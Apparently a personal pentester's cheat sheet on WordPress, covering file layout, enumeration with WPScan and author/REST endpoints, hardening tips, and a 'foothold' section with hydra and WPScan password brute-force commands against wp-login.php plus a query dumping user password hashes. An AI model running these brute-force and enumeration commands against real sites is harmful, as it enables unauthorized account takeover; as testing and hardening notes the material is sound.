WordPress
WordPress is a system that was created to build and manage blogs. It's now widely used for any kind of website. There are ton of plugins making it fast and easy to create websites π.
- Learning websites π§βπ: search for "LMS" plugins
- Manga websites π: search for "madara" or "MangaStream"
- ...
β οΈ Note that most themes/plugins are paid.
Useful links?
- wpgiz (blog)
- themeforest (themes) or jojo-themes (themes)
WordPress Overview
Common WordPress Endpoints
Files
Folders
Themes are stored in /wp-content/themes/<theme_name>/
.
Plugin files are stored in /wp-content/plugins/<plugin_name>/
. There is usually a readme.html explaining how it works.
Uploaded files are stored in /wp-content/uploads/
.
Critical internal WordPress files are stored in /wp-includes
.
WordPress Pentester Notes β οΈ
WordPress Enumeration
You can enumerate metadata, themes, plugins, and usernames.
- You can use WPScan to enumerate most of it
$ wpscan --url URL
$ wpscan --url URL -e u # users
$ wpscan --url URL -e t # themes (or 'vt')
$ wpscan --url URL -e ap # plugins (or 'p' or 'vp')
$ wpscan --url URL [...] --plugins-detection aggressive
-
Manually explore
/wp-content/**/**
if directory listing is enabled -
WordPress version is in the source code or can be inferred from the default theme (
<meta name="generator" content="WordPress X.Y.Z">
) -
Plugin and theme names/versions are exposed within the website source code (link/script). The URL may include the version.
-
Look for links to user accounts, iterate
/?author=<id>
, or use/wp-json/wp/v2/users
for versions before 4.7.1. While crawling the website, you may also find URLs such as/author
.
$ onectf crawl -u URL | grep author
- You can try to look in
/robots.txt
for something unexpected
WordPress FootHold
- The password may be weak and vulnerable to brute force:
$ wpscan --url URL -P wordlist -U username # ", username2, etc."
$ hydra -l username -P wordlist domain http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -V
$ hydra -l username -P wordlist domain http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:F=is incorrect.' -V
While using xmlrpc
is faster, it's not always 'enabled.' Ensure it's present and enabled before using it. WPScan automatically checks if it can, but this check is bypassed using --password-attack xmlrpc
.
WordPress Exploitation
Refer to:
π» To-do π»
Stuff that I found, but never read/used yet.
WordPress Hardening
- Remove unused themes, and plugins
- Hide username
- Disable register
- Use security plugins (change login page URL, ban IPs...)
- Admins can write HTML in comments, it will be executed, but not normal users
- Deactivating plugins doesn't remove its files
- Auto-update? (themes and plugins too)
- Install only trusted themes/plugins
- sucuri-scanner, better-wp-security, wordfence
Configuration
- wp-config.php > can enable debug with "WP_DEBUG"
- set the main page > settings > reading > static page
- usually apache (
/var/www/html
) and mysql
Plugins
- Elementor
- JetPack
Stuff
- CMA, CDA
- WYSIWYG
-
/wp-admin/
,login.php
,wp-login.php
-
xmlrpc.php
(XML API) -
select user_login,user_pass from wp_users;
- 10 levels of access, 5 (actually 6 with SA) roles